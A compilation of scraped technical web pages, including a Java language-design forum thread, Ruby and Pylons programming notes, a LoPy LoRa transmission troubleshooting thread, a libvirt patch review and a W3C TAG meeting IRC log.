Yep, sounds good. My interest for it dropped once iOS7 made "keyboard-shrinks-view" the default (much better for apps). On Mon, Jun 23, 2014 at 5:31 PM, Shazron <shazron@gmail.com> wrote: > This plugin has been moved to the org.apache.cordova.labs namespace so > it doesn't affect our plugin releases. > > I feel that this plugin is better off in the hands of 3rd party devs > like ionic: > > I personally am not going to be maintaining it anymore primarily > because of the testing complexity (see manual tests in mobile-spec) > and I prefer not to muck around with the keyboard native views (which > is extremely hacky). Also because of iOS 8 support for custom > keyboards. >
http://mail-archives.apache.org/mod_mbox/cordova-dev/201406.mbox/%3CCABiQX1WBCmDStcj189r=g8PRQR7eg0MvN6_MTf-L7LWm1j7EPg@mail.gmail.com%3E
16 replies on 2 pages. Most recent reply: Dec 19, 2007 1:21 AM by Howard Lovatt

First up, a quick critique of the proposals. The idea is that if you use a static import then you can call an imported static method using the dot notation used currently for instance methods, e.g.:

import static java.util.Collections.*;
...
list.sort();

Whereas currently you would have to write:

sort( list );

It is certainly nice that using the proposal you gain some readability, because methods read left to right; for example, consider chaining methods:

list.synchronizedList().sort();

Which reads better than:

sort( synchronizedList( list ) );

On the downside, the proposal implies that sort is part of List and that it is dynamically dispatched. But suppose you wanted a different sort that was more optimal for a ConcurrentLinkedQueue, and that was also statically imported:

import static java.util.Collections.*;
import static MySortMethod.*; // Includes a sort method for ConcurrentLinkedQueue
...
List list = new ConcurrentLinkedQueue();
list.sort();

There are two sort methods, one associated with List and one with ConcurrentLinkedQueue. With normal dynamic dispatch, as implied by the dot notation, you would expect sort( ConcurrentLinkedQueue ) to be called. But it won't be; because the dispatch is static, sort( List ) is called.

This second proposal is that if a method returns void it is assumed to return its own receiver (similar to returning this, but retaining the type of the receiver, which might be a sub-type of this), e.g.:

list.add( 1, "A" ).add( 2, "B" );

Currently you would write:

list.add( 1, "A" );
list.add( 2, "B" );

The proposal certainly reduces repetition. But it has a limited use case, e.g. add( int, Object ) returns void but add( Object ) returns boolean and therefore can't be used.

One of the main use cases for this proposal is the Builder pattern in conjunction with settable properties, e.g.:

Home home = new Builder().setWindows( windows ).setDoors( doors ).makeHome();

I will come back to this builder example below; the key point is that the result of makeHome is a Home, not a Builder.

I would like to propose a superior alternative to both the above proposals. Pascal and other languages have a with construct that saves repeating the receiver of the call. Similarly, a with construct, but using an operator, could be added to Java. The examples given above for both Extension Methods and Chained Invocation can be expressed as a with clause, demonstrating that both proposals can be unified:

list -> synchronizedList() -> sort();

list -> { add( 1, "A" ); add( 2, "B" ); };

Home home = new Builder() -> { setWindows( windows ); setDoors( doors ); makeHome(); };

The -> operator supplies the first argument to any method. For instance methods the first argument is the receiver (hidden this). If -> is applied to a block then the object on the left of -> is supplied to all the methods, and the value of -> is the value of the last method (values from intermediate methods are discarded).

Using a different operator, ->, has the advantage of not implying dynamic dispatch, and since the feature works with all methods (instance methods, statically imported functions, and non-statically imported functions) it has a wide use case.

What do fellow Artimans think; are Extension Methods, Chained Invocations, or with clauses worth adding?
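For comparison, the chained Builder call above can already be approximated in today's Java with an anonymous subclass plus an instance-initializer block (the so-called double-brace idiom), at the cost of an extra class per call site. A minimal runnable sketch with made-up stand-ins for the post's Builder and Home:

```java
public class WithDemo {
    // hypothetical stand-ins for the article's Builder/Home
    static class Home {
        final int windows, doors;
        Home(int windows, int doors) { this.windows = windows; this.doors = doors; }
    }

    static class Builder {
        int windows, doors;
        void setWindows(int w) { windows = w; }   // note: returns void
        void setDoors(int d) { doors = d; }       // note: returns void
        Home makeHome() { return new Home(windows, doors); }
    }

    public static void main(String[] args) {
        // the instance initializer plays the role of the proposed 'with' block
        Home home = new Builder() {{
            setWindows(8);
            setDoors(2);
        }}.makeHome();
        System.out.println(home.windows + " windows, " + home.doors + " doors");
    }
}
```

The idiom works even though the setters return void, but it creates an anonymous subclass per use and so is generally considered a workaround rather than a replacement for either proposal.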
add( int, Object ) add( Object ) boolean One of the main use cases for this proposal is the Builder pattern in conjunction with settable properties, e.g.: Home home = new Builder().setWindows( windows ).setDoors( doors ).makeHome(); I will come back to this builder example below, the key point is that the result of makeHome is a Home not a Builder. makeHome Builder I would like to propose a superior alternative to both the above proposals. Pascal and other languages have a with construct that saves repeating the receiver of the call. Similarly a with construct but using an operator could be added to Java. The examples given above for both Extension Methods and Chained Invocation can be expressed as a with clause thus demonstrating that both proposals can be unified. list -> synchronizedList() -> sort(); list -> { add( 1, "A" ); add( 2, "B" ); }; Home home = new Builder() -> { setWindows( windows ); setDoors( doors ); makeHome(); }; The -> operator supplies the first argument to any method. For instance methods the first argument is the receiver (hidden this). If -> is applied to a block then the object on the left of -> is supplied to all the methods and the value of -> is the value of the last method (values from intermediate methods are discarded). -> Using a different operator, ->, has the advantage of not implying dynamic dispatch and since the feature works with all methods: instance methods, statically imported functions, and non-statically imported functions it has a wide use case. What do fellow Artima's think; are Extension Methods, Chained Invocations, or with clauses worth adding? Home home = new Builder(){{ setWindows( windows ); setDoors( doors );}}.makeHome(); list -> sort(); sort(list); |. :. list |. sort(); // in your syntax: list -> sort()list|.sort(); // looks more like list.sort() (i.e. normal method invocationlist |. Collections.sort(); // 'pipe' it to Collections#sort(List)list |.synchronizedList() |.sort(); . 
list->synchronizedList()->sort(); int index = list->{ sort(); binarySearch( key ); }; list.{ add( 1, "A" ); add( 2, "B" ); }; Home home = new Builder().{ setWindows( windows ); setDoors( doors ); makeHome(); }; foo |. bar(); // versions axel_1 and axel_2// axel_1 could be read as: pipe list to the result of FooBar#sort()foo |. FooBar.bar(); // version axel_1//while axel_2 pipes to FooBar and then there is some kind of invocationfoo |FooBar. bar(); // version axel_2foo | org.stuff.FooBar .bar(); // version axel_2foo |. org.stuff.FooBar#bar(); // version axel_3, 'method literal syntax' list -> filter( test1 ) -> filter( test2 ) -> sort(); sort( filter( filter( list, test1 ), test2 ) );
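For readers who want to experiment with the semantics, the behaviour of the proposed -> operator (the left-hand value is supplied as the first argument, and a void result keeps the receiver) can be sketched in Python. This pipe helper is purely illustrative and is not part of any Java proposal:

```python
def pipe(value, *calls):
    """Apply each (function, *extra_args) pair to a running value.

    The left-hand value is supplied as the first argument, mimicking
    the proposed '->' operator; a None return models a 'void' method,
    in which case the receiver is kept (Chained Invocation semantics).
    """
    result = value
    for func, *extra in calls:
        out = func(result, *extra)
        result = result if out is None else out
    return result

# list.append and list.sort return None, so the receiver is threaded through:
print(pipe([3, 1, 2], (list.append, 0), (list.sort,)))  # -> [0, 1, 2, 3]

# A function with a real return value (sorted) replaces the running value:
print(pipe([3, 1, 2], (sorted,)))  # -> [1, 2, 3]
```

The None-means-keep-receiver rule is exactly the special case that makes the Chained Invocation proposal attractive for void setters.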
http://www.artima.com/forums/flat.jsp?forum=106&thread=220783
Some classes, like Integer, can be created with a method that looks like the class name:

    Integer(1) #=> 1

Integer here is not an initializer; it is a Kernel method. In fact, it is defined as Kernel.Integer. You can simply create a new method that acts as initializer for your custom class:

    class Foo
      def initialize(arg)
        @arg = arg
      end
    end

    def Foo(arg)
      Foo.new(arg)
    end

    Foo("hello") # => #<Foo:0x007fa7140a0e20 @arg="hello">

However, you should avoid polluting the main namespace with such methods. Integer (and a few others) exists because the Integer class has no initializer:

    Integer.new(1) # => NoMethodError: undefined method `new' for Integer:Class

Integer can be considered a factory method: it attempts to convert the input into an Integer, and returns the most appropriate concrete class:

    Integer(1).class # => Fixnum
    Integer(1000 ** 1000).class # => Bignum

Unless you have a real reason to create a similar initializer, I'd just avoid it. You can easily create static methods attached to your class that convert the input into an instance.
https://codedump.io/share/XXGADLkNiSow/1/how-to-define-class-name-method-like-integer-and-when-should-i-use-it
Adding commands to Paster

Paster command

The command line will be paster my-command arg1 arg2 if the current directory is the application egg, or paster --plugin=MyPylonsApp my-command arg1 arg2 otherwise. In the latter case, MyPylonsApp must have been installed via easy_install or python setup.py develop.

Make a package directory for your commands:

    $ mkdir myapp/commands
    $ touch myapp/commands/__init__.py

Create a module myapp/commands/my_command.py like this:

    from paste.script.command import Command

    class MyCommand(Command):
        # Parser configuration
        summary = "--NO SUMMARY--"
        usage = "--NO USAGE--"
        group_name = "myapp"
        parser = Command.standard_parser(verbose=False)

        def command(self):
            import pprint
            print "Hello, app script world!"
            print
            print "My options are:"
            print "    ", pprint.pformat(vars(self.options))
            print "My args are:"
            print "    ", pprint.pformat(self.args)
            print
            print "My parser help is:"
            print
            print self.parser.format_help()

Note: The class _must_ define .command, .parser, and .summary

Modify the entry_points argument in setup.py to contain:

    [paste.paster_command]
    my-command = myapp.commands.my_command:MyCommand

Run python setup.py develop or easy_install . to update the entry points in the egg in sys.path. Now you should be able to run:

    $ paster --plugin=MyApp my-command arg1 arg2
    Hello, MyApp script world!

    My options are:
         {'interactive': False, 'overwrite': False, 'quiet': 0, 'verbose': 0}
    My args are:
         ['arg1', 'arg2']

    My parser help is:

    Usage: /usr/local/bin/paster my-command [options]
    --NO USAGE--

    --NO SUMMARY--

    Options:
      -h, --help  show this help message and exit

    $ paster --plugin=MyApp --help
    Usage: paster [paster_options] COMMAND [command_options] ...
    myapp:
      my-command      --NO SUMMARY--
    pylons:
      controller      Create a Controller and accompanying functional test
      restcontroller  Create a REST Controller and accompanying functional test
      shell           Open an interactive shell with the Pylons app loaded

Required class attributes

In addition to the .command method, the class should define .parser and .summary.

Command-line options

Command.standard_parser() returns a Python OptionParser. Calling parser.add_option enables the developer to add as many options as desired. Inside the .command method, the user's options are available under self.options, and any additional arguments are in self.args.

There are several other class attributes that affect the parser; see them defined in paste.script.command:Command. The most useful attributes are .usage, .description, .min_args, and .max_args. .usage is the part of the usage string _after_ the command name. The .standard_parser() method has several optional arguments to add standardized options; some of these got added to my parser although I don't see how.

See the paster shell command, pylons.commands:ShellCommand, for an example of using command-line options and loading the .ini file and model. Also see "paster setup-app" where it is defined in paste.script.appinstall.SetupCommand. This is evident from the entry point in PasteScript (PasteScript-VERSION.egg/EGG_INFO/entry_points.txt). It is a complex example of reading a config file and delegating to another entry point. The code for calling myapp.websetup:setup_config is in paste.script.appinstall.

The Command class also has several convenience methods to handle console prompts, enable logging, verify directories exist and that files have expected content, insert text into a file, run a shell command, add files to Subversion, parse "var=value" arguments, and add variables to an .ini file.

Using paster to access a Pylons app

Paster provides request and post commands for running requests on an application.
These commands will be run in the full configuration context of a normal application. This is useful for cron jobs; the error handler will also be in place, and you can get email reports of failed requests. Because the arguments all just go in QUERY_STRING, request.GET and request.PARAMS won't look like you expect. But you can parse them with something like:

    parser = optparse.OptionParser()
    parser.add_option(etc)
    args = [item[0] for item in cgi.parse_qsl(request.environ['QUERY_STRING'])]
    options, args = parser.parse_args(args)

paster request / post

Usage: paster request / post [options] CONFIG_FILE URL [OPTIONS/ARGUMENTS]

Run a request for the described application.

This command makes an artificial request to a web application that uses a paste.deploy configuration file for the server and application. Use 'paster request config.ini /url' to request /url. Use 'paster post config.ini /url < data' to do a POST with the given request body. If the URL is relative (i.e. doesn't begin with /) it is interpreted as relative to /.command/. The variable environ['paste.command_request'] will be set to True in the request, so your application can distinguish these calls from normal requests.

Note that you can pass options besides the options listed here; any unknown options will be passed to the application in environ['QUERY_STRING'].

    Options:
      -h, --help            show this help message and exit
      -v, --verbose
      -q, --quiet
      -n NAME, --app-name=NAME
                            Load the named application (default main)
      --config-var=NAME:VALUE
                            Variable to make available in the config for %()s
                            substitution (you can use this option multiple times)
      --header=NAME:VALUE   Header to add to request (you can use this option
                            multiple times)
      --display-headers     Display headers before the response body

Future development

A Pylons controller that handled some of this would probably be quite useful.
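The QUERY_STRING parsing idea can be tried as a self-contained Python 3 snippet. This sketch uses urllib.parse in place of the legacy cgi module, and the option names (--verbose, --limit) are made up for illustration; it also splits key=value pairs into two tokens so that valued options survive the round trip:

```python
import optparse
from urllib.parse import parse_qsl

def tokens_from_query_string(qs):
    # Turn '--verbose&--limit=5&report' into argv-style tokens.
    # keep_blank_values=True keeps bare flags like '--verbose' that have
    # no '=value' part; a 'key=value' pair becomes two separate tokens.
    tokens = []
    for key, value in parse_qsl(qs, keep_blank_values=True):
        tokens.append(key)
        if value:
            tokens.append(value)
    return tokens

parser = optparse.OptionParser()
parser.add_option("--verbose", action="store_true", default=False)
parser.add_option("--limit", type="int", default=10)

options, args = parser.parse_args(
    tokens_from_query_string("--verbose&--limit=5&report"))
print(options.verbose, options.limit, args)  # -> True 5 ['report']
```

In a real paster request handler you would feed request.environ['QUERY_STRING'] in instead of the literal string.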
Probably even nicer with additions to the current template, so that /.command/ all gets routed to a single controller that uses actions for the various sub-commands, and can provide a useful response to /.command/?-h, etc.
http://docs.pylonsproject.org/projects/pylons-webframework/en/latest/advanced_pylons/paster_commands.html
[SOLVED] LoPy LoRa general consumption/efficiency (code and scope printscreen)

Hello, please sit down because I have a long post about LoRa:
- my main objective is to send some sensor data via LoRa from one LoPy to another, then deepsleep.
- the code is simple and practical, but there were some strange details:

    from network import LoRa
    import socket
    import time
    import binascii
    import pycom
    from pysense import Pysense
    import machine
    from SI7006A20 import SI7006A20
    from LTR329ALS01 import LTR329ALS01
    from MPL3115A2 import MPL3115A2,ALTITUDE,PRESSURE
    import json

    py = Pysense()
    si = SI7006A20(py)
    lt = LTR329ALS01(py)
    mp = MPL3115A2(py,mode=ALTITUDE)
    mpp = MPL3115A2(py,mode=PRESSURE)

    data1=mp.temperature()
    data2=mpp.pressure()
    data3=si.humidity()
    data4=lt.light()
    data = "%.0d %.0d %.0d %.0d" % (data1,data2,data3,data4)

    lora = LoRa(mode=LoRa.LORA)
    s = socket.socket(socket.AF_LORA, socket.SOCK_RAW)
    s.setsockopt(socket.SOL_LORA, socket.SO_DR, 5)
    lora.nvram_restore()
    s.setblocking(False)

    for x in range (3):
        s.setblocking(False)
        s.send(data)
        time.sleep(0.2)
        s.setblocking(True)
        s.send(data)
        time.sleep(0.2)

    s.setblocking(False)
    py.setup_sleep(1)
    py.go_to_sleep()

That is the current consumption; as you can see it wakes up, has a little delay, I send the same data 6 times and then deepsleep. The reason I send it 6 times is that it is not received very well and I hope that out of 6 times it will be received at least once. Besides that, sometimes it works ONLY when setblocking is FALSE and other times ONLY when it's TRUE (I don't understand why). The solution is not very practical; the 2 LoPys were at 30cm distance and the transmission was poor. So I decided to see if there is a correspondence between message length and probability of reception.
I made a code where it sends first 10 characters, then 20, and then 40 (between them I have RGB lights just for reference), the code:

    from network import LoRa
    import socket
    import time
    import pycom
    from pysense import Pysense

    pycom.heartbeat(False)
    py = Pysense()
    lora = LoRa(mode=LoRa.LORA, tx_power=18, sf=6 ,frequency=863000000)
    s = socket.socket(socket.AF_LORA, socket.SOCK_RAW)
    s.setblocking(False)

    pycom.rgbled(0xffffff)
    time.sleep(0.5)
    pycom.heartbeat(False)
    s.send('1234567890')

    pycom.rgbled(0xffff00)
    time.sleep(0.1)
    pycom.heartbeat(False)
    s.send('12345678901234567890')

    pycom.rgbled(0x0000ff)
    time.sleep(0.1)
    pycom.heartbeat(False)
    s.send('1234567890123456789012345678901234567890')
    # and another one with 80 characters that doesn't fit in the screen

    pycom.rgbled(0x00ff00)
    time.sleep(0.2)
    py.setup_sleep(15)
    py.go_to_sleep()

With the following consumption. With a little zoom on the transmission:
- This is very disappointing: the transmission length is the same whether I send 10, 20, 40 or 80 characters. Why is that?
- What are those spikes right before the transmission?
- Why does it take 10.4 ms to send it? When I used the functions chrono.start() / chrono.read() / chrono.stop() they indicated only 70 us.
- How can I improve the transmission efficiency (tx_power? spreading factor? frequency?)

Thanks for your patience and hope for the best!

Hello @braulio. I think the extra milliseconds are from LoPy info processing; you can try with a different number (10 seconds, 20, 30 etc) and if the "extra" time is the same then you have a solution. Also you should make a new post; the topic is quite different from this one.

Please help me with this code:

    import time
    chrono = Timer.Chrono()
    ...
    chrono.start()
    time.sleep(5)
    chrono.stop()
    ....
    print(chrono.read())

I measure 5023 seconds. How can I make accurate measurements?
It should be 5 seconds.

I am in equal measure happy and mad; the ONLY problem regarding the transmission quality was the SF. At the default value it had the biggest problems, but when I put it to 12 (the maximum) it worked just fine (at short distances too). Although it is an old post, I hope that someone with the same problem will find this answer useful in the future!

Solved the TX part using the functions chrono.start() / chrono.read() / chrono.stop() along with lora.callback() and lora.events(). It now takes 28ms to send 1 character, 58ms to send 20, 115ms to send 60 and so on...

@iplooky Hard to say what's wrong. I made my first test with the lopy-lopy examples, and they worked ok, as long as I started lopy-b first. No problem with a short distance. I have also set up a LoPy as TTN gateway and a FiPy as TTN node, and walked away like 500m from the gateway. Still at an RSSI of -100, being able to send and receive messages. I also receive messages at the gateway from nodes like 3 km away, estimated from the RSSI level of -126 to -130. I'll try some larger (than 500m) distances later.

@robert-hh Poor transmission means the following: if I want to send a short message (7 characters) there is only a slight chance to receive it on the first try (but still I send it 6 times consecutively just to be sure); 10, 20, 40 or 80 characters have a nearly 0 chance to be received. (10 meters, SF=7/DR=5, TX_power=20)

@jmarcelino so:

    lora = LoRa(mode=LoRa.LORA, tx_power=20 , sf=7 ,frequency=863000000) # europe 863MHz
    s = socket.socket(socket.AF_LORA, socket.SOCK_RAW)
    s.setblocking(False)

should work just fine?

- jmarcelino: @iplooky In LoRa mode the socket.SO_DR socket options are ignored; those are meant for LoRaWAN mode. For LoRa please set all these parameters at init time in your LoRa() call; for LoRaWAN set them via socket options.

@jmarcelino should the receiver code be the same in any case, or do I need to modify the LoRa parameters there too?
I mean:

    from network import LoRa
    import socket
    import time

    lora = LoRa(mode=LoRa.LORA, rx_iq=True ,frequency=863000000)
    s = socket.socket(socket.AF_LORA, socket.SOCK_RAW)
    s.setsockopt(socket.SOL_LORA, socket.SO_DR, 5)
    s.setblocking(False)
    print("start")
    while True:
        mesaj = s.recv(64)
        if(mesaj != b''):
            print(mesaj)

...should this be a universal code, OR should I try to modify it there too? (DR, SF, freq)

Also:
- from what I've understood, DR and SF are complementary: if DR is 5 that automatically means SF is 7 (and therefore I should not modify it because it's known already from DR)?
- should tx_power=20 also have an rx_power=20, or just rx_iq=True?
- putting the 2 LoPys several meters apart and testing the code gives the same bad results (poor transmission)

- jmarcelino: @iplooky TX power = 20dBm isn't legal in Europe for most channels (there are some exceptions); by law it should be 14dBm. But yes, it generally would greatly increase the signal (at the cost of higher power consumption).

@jmarcelino would tx_power = 20 (the maximum value) influence it in any way? (in comparison with the default value?) I've read one of your old posts, but it being 7 months old I was wondering if updates/improvements have appeared.

- jmarcelino: It's not possible to have accurate DR-to-distance calculations. What you can know is the lowest SNR at which a signal can be decoded, and that depends on the spreading factor. Higher spreading factors mean lower data rates. So at SF7 (or DR5) you can decode down to an SNR of -7.5; at SF12 (DR0) you can go as low as -20, effectively being able to pick up weaker signals. However, three problems: At SF12 the transmission of 10 bytes takes 1483ms, which means that (considering Europe's) duty cycle restrictions of 1% you'll need to wait a very long time until you can transmit again on that channel: 131 seconds!
Also it means you have the radio fully on for that time, consuming more energy. Finally, since the transmission takes so long, you're also at higher risk of collision/interference from other transmitters operating on the same frequency.

@iplooky The slowest data rates (smallest DR number and largest SF) have in theory the longest coverage. With devices in the same room, DR5 (SF7) should be more than enough. If you want to test long-distance, you'll probably go for DR0 (SF12). You can adjust the actual DR based on the received signal levels (RSSI and SNR).

@robert-hh If I understood correctly, I should lower the DR in order to increase the chance to receive the message; in my case it is approx. 20 characters long, so DR=1 should work just fine. Is there a datasheet where I can see the correspondence between SF and distance?

@iplooky DR = Data Rate. The time needed to send a byte depends on the data rate setting. The default here is 5, alias DR5 = 5470 bits per second. At that data rate, even messages with the shortest payload take about 20ms airtime. The join request/accept messages are on air for instance about 70 ms; the test messages from the example with 6 bytes payload take about 30 ms.

@robert-hh I don't quite know what DR means and where to modify it.

@jcaron I didn't disable the Wi-Fi; I will try it next time I have access to the scope.

@rcolistete OK, I will try to increase the distance between the LoPys. I don't quite know what parameters to modify and by how much; I will try to measure the transmission time with chrono.start() and chrono.stop() when the acknowledge signal is received (assuming the transmission is made 100% accurately).

- rcolistete: You've said "the 2 LoPys were at 30cm distance and the transmission was poor", while LoRa has problems at low distances, depending on its configuration (SF, BW, tx_power), because it saturates the amplifier. The solution is simple: put the two LoPys some meters apart.
Also, my experience with "setblocking(True)" isn't good*, so I suggest avoiding it. (*): any send is a lot slower when "setblocking(True)" is chosen and the Terminal is running.

Regarding the spikes, they do not seem to be related to transmission, as they are present during the whole active time of the LoPy. They seem to occur every 100 ms, i.e. at 10 Hz. As they start quite early, they're probably related to something started by the system. Have you disabled Wi-Fi on boot?

@iplooky You may also look into the picture here, where you can see the sensing of an OTAA join request and response. The actual time on air is like 70 ms at DR5.
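The airtime and duty-cycle figures discussed in this thread (tens of ms at SF7, well over a second at SF12, and a long mandatory silence at 1% duty cycle) can be estimated with the standard LoRa time-on-air formula from Semtech's SX127x documentation. The sketch below is an approximation, not Pycom firmware code: it assumes an explicit header, CRC on, coding rate 4/5 and an 8-symbol preamble, so its numbers will not match the thread's exactly.

```python
import math

def lora_airtime(payload_bytes, sf, bw=125000, cr=1, preamble=8,
                 explicit_header=True, crc=True):
    """Approximate LoRa packet time-on-air in seconds (SX127x formula)."""
    # Low data-rate optimization is mandated for SF11/SF12 at 125 kHz.
    de = 1 if (bw == 125000 and sf >= 11) else 0
    t_sym = (2 ** sf) / bw                       # symbol duration
    ih = 0 if explicit_header else 1
    num = 8 * payload_bytes - 4 * sf + 28 + 16 * (1 if crc else 0) - 20 * ih
    payload_symbols = 8 + max(math.ceil(num / (4 * (sf - 2 * de))) * (cr + 4), 0)
    return (preamble + 4.25) * t_sym + payload_symbols * t_sym

# Airtime grows sharply with SF; at a 1% duty cycle the mandatory
# silence after a transmission is roughly airtime * 99.
for sf in (7, 12):
    t = lora_airtime(10, sf)
    print("SF%d: %.0f ms on air, ~%.0f s wait at 1%% duty" % (sf, t * 1e3, t * 99))
```

This makes the trade-off in the thread concrete: going from SF7 to SF12 buys sensitivity but multiplies time-on-air (and hence energy use and duty-cycle wait) by more than 20x.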
https://forum.pycom.io/topic/2760/solved-lopy-lora-general-consumption-effiency-code-and-scope-printscreen/?lang
On 05/04/2012 12:51 PM, Laine Stump wrote:
> This value will be needed to set the src_pid when sending netlink
> messages to lldpad. It is part of the solution to:
>
>
> Note that libnl's port generation algorithm guarantees that the
> nl_socket_get_local_port() will always be > 0, so it is okay to cast
> the uint32_t to int (thus allowing us to use -1 as an error sentinel).

I had to look; we always let libnl generate a socket, and indeed the libnl code returns a uint32_t, but computes that value as 'pid + (n << 22);', where n is at most 32, and where pid is at most PID_MAX_LIMIT of 2^22, so the end result is less than 31 bits and therefore positive when cast to int.

Maybe it would help to tweak the wording a bit:

    Note that libnl's port generation algorithm guarantees that the
    uint32_t result of nl_socket_get_local_port() will never set the
    most significant bit, and therefore will be positive when cast to
    int, allowing us to use -1 as an error sentinel.

> /**
> + * virNetlinkEventServiceLocalPid:
> + *
> + * Returns the nl_pid value that was used to bind() the netlink socket
> + * used by the netlink event service, or -1 on error (netlink
> + * guarantees that this value will always be > 0).
> + */
> +int virNetlinkEventServiceLocalPid(void)
> +{
> +    if (!(server && server->netlinknh)) {
> +        netlinkError(VIR_ERR_INTERNAL_ERROR, "%s",
> +                     _("netlink event service not running"));
> +        return -1;
> +    }
> +    return (int)nl_socket_get_local_port(server->netlinknh);

Technically, the cast is redundant, but I'm okay if you leave it in.

ACK; this one can technically be applied without test results, although it doesn't hurt to wait for the rest of the series.

--
Eric Blake   eblake redhat com   +1-919-301-3266
Libvirt virtualization library

Attachment: signature.asc
Description: OpenPGP digital signature
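The reviewer's bound is easy to verify with the numbers quoted in the review: libnl computes the port as pid + (n << 22), with pid at most PID_MAX_LIMIT (2^22) and n at most 32, so the worst case stays well below 2^31 and the cast to a signed int can never produce a negative value.

```python
PID_MAX_LIMIT = 1 << 22   # kernel upper bound on pid, as quoted in the review
MAX_N = 32                # libnl per-process counter bound, as quoted in the review

# Worst case of libnl's 'pid + (n << 22)' port generation:
max_port = PID_MAX_LIMIT + (MAX_N << 22)
print(max_port, max_port < 2**31)  # -> 138412032 True
```

Since 138412032 = 33 * 2^22 needs only 28 bits, the sign bit of a 32-bit int is never set, which is exactly why -1 is a safe error sentinel.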
https://www.redhat.com/archives/libvir-list/2012-May/msg00350.html
Normally, if you have a private method, you can't call it with an explicit receiver, even if that receiver is self. So you can't say:

    def foo
      self.bar # explicit receiver
    end

    private

    def bar
      123
    end

Instead, foo needs to call simply bar, leaving the self implicit:

    def foo
      bar # implicit receiver
    end

However, when you call setters, you always need an explicit receiver, or you'll just assign a local variable:

    def assign_things
      self.a = 123
      b = 456
    end

    def a=(v)
      puts "This one gets called."
    end

    def b=(v)
      raise "This one never does; the other method makes a local called `b` instead."
    end

So, what do you do if you have a private setter? You call it with an explicit receiver:

    def assign_things
      self.a = 123
    end

    private

    def a=(v)
      puts "This is called successfully."
    end

There's a crazy special exception in Ruby that lets you use an explicit receiver of self with a setter just so that you can call private setters. This strikes me as weird. Why can't you call any private method explicitly on self? I thought it was just easier to implement Ruby if you couldn't, but if they made it work for setters, I'm not sure what the big deal is.
http://pivotallabs.com/private-setters-in-ruby-what-to-do/
IRC log of tagmem on 2006-04-04 Timestamps are in UTC. 17:09:42 [RRSAgent] RRSAgent has joined #tagmem 17:09:42 [RRSAgent] logging to 17:09:44 [Zakim] +TimBL 17:09:59 [ht] scribe: raman 17:10:08 [ht] chair: Vincent Quint 17:10:14 [ht] meeting: TAG telcon 17:10:24 [ht] scribenick: raman 17:10:25 [timbl] timbl has joined #tagmem 17:10:40 [DanC] raman, it's traditional to have the machine draft minutes, then edit them and check them in under /2001/tag/YYYY/MM, and then mail a pointer to www-tag. But practice varies considerably. 17:11:35 [raman] so you dont want me to scribe on IRC? 17:11:54 [DanC] sorry, yes... the machine drafts then based on what you write in IRC 17:11:59 [DanC] drafts them 17:12:06 [raman] I'd prefer to just type in here --- dont have cycles to turn it into a new work activity of its own:-) 17:13:06 [raman] last week's minutes approved subject to HT's final edits. 17:14:38 [DanC] (henry, so the minutes will stay at ? I want their address in today's minutes) 17:14:51 [ht] DanC, yes. 17:15:26 [DanC] q+ 17:15:58 [Norm] So do we have tentative dates in Oct? 17:16:08 [Norm] Yes, nevermind. 17:19:54 [DanC] I prefer a 2 day meeting. I'm not sure I can muster 3 days of steam. 
17:20:24 [Vincent] ack danc 17:20:53 [raman] also issue: Venice is a long way to travel for 2 days 17:22:11 [DanC] ACTION DanC: explore Venice meeting venue 17:23:34 [DanC] q+ to note a possible conflict with the June meeting 17:24:05 [DanC] -> June meeting logistics 17:26:27 [Vincent] ack danc 17:26:27 [Zakim] DanC, you wanted to note a possible conflict with the June meeting 17:26:33 [raman] ACTION: Norm to send hotel details in a week 17:27:36 [raman] Vincent: AC Meeting At WWW 2006 Edinburgh 17:27:45 [raman] Tag Summary to be reviewed by email 17:28:36 [raman] Possible TAG session at AC Meeting 17:36:37 [raman] Conclusion: no active TAG interest in adding to AC Meeting agenda 17:39:14 [ht] is now cleaned up 17:39:33 [DanC] -> our recent WD 17:44:50 [raman] HT: Introduces URN discussion 17:44:58 [ht] 17:45:01 [DanC] following my nose from the agenda, I get 1.7 2006/04/04 16:32:06 ; can anybody confirm? 17:45:11 [ht] yes, DanC 17:47:39 [raman] HT: Document covers a number of different proposals/patterns of use for new URI schemes etc. --- identify things we think of as information resources 17:48:07 [raman] HT: reorged to make section2 a simple, short summary of why the TAG doesn't think that for many purposes such things are different from http: in interesting ways. 17:48:16 [DanC] (implicit? darn.) 17:48:19 [raman] If not, then you shouldn't be forking the Web 17:48:37 [raman] HT: would like feedback on the document style --- and also wants input on sections 2.7 and 2.8 17:48:57 [timbl] ?NRI 17:49:03 [Norm] "New Resource Identifiers" I expect 17:49:08 [raman] DanC: NRI is jarring 17:49:46 [DanC] "recent proposals ([RFC 3688], [oasis URN], [XRI])" 17:49:47 [raman] HT: we're not just responding to XRIs --- we want to cover anyone who wants to mint a new namespace for electronic resources e.g. 
New Zealand Govt 17:50:10 [raman] DanC: suggests adding info: 17:50:17 [raman] TimBL we can discuss Info: 17:50:25 [ht] s/new namespace/new URN subspace/ 17:50:35 [raman] TimBL: convinced XRIs are a bad idea, not sure if info: is any worse than mailto: 17:50:45 [raman] DanC: info: looks exactly like XRI 17:51:15 [raman] Some confusion as to how info: thingies are resolved 17:53:59 [raman] tvr: recommend not using an acronym like NRI 17:55:26 [timbl] nRI 17:55:28 [timbl] _RI 17:58:05 [raman] TimBL: one of the problems with HTTP is that one cannot get a URI space for ever. 17:58:14 [raman] TimBL: perhaps pull that out as an issue? 17:58:38 [raman] Perpetual Resource Identifiers? 17:59:56 [raman] HT: believes that the XRI spec as it stands no longer claims to solve/address the perpetual resource problem, since they also use DNS for resolution 18:01:35 [DanC] q+ 18:02:12 [DanC] q+ to say yes, timbl, let's hope folks considering DAV: and dix: URIs schemes _will_ look here 18:02:48 [DanC] [[ 18:02:48 [DanC]. 18:02:49 [DanC] ]] 18:02:51 [raman] HT: as we've worked on the finding, we have moved towards DanC's position -- 18:02:56 [raman] DanC pastes it in below 18:02:59 [DanC] right under 3 The value of http: URIs 18:03:08 [Vincent] ack danc 18:03:08 [Zakim] DanC, you wanted to say yes, timbl, let's hope folks considering DAV: and dix: URIs schemes _will_ look here 18:03:29 [timbl] q+ to suggest a title "The dangers of URNs and Registries" 18:04:01 [timbl] or "the poverty of" 18:04:03 [Vincent] ack timbl 18:04:03 [Zakim] timbl, you wanted to suggest a title "The dangers of URNs and Registries" 18:04:23 [timbl] q- 18:04:50 [DanC] (formatting around 2.7 Rich authority is goofy) 18:05:06 [raman] HT: 2.6 URI for an object vs URI to the metadata for that object 18:05:18 [raman] HT: what do people think? 18:05:30 [timbl] q+ 18:05:45 [DanC] (this is another place where I'd find a full survey more useful.) 
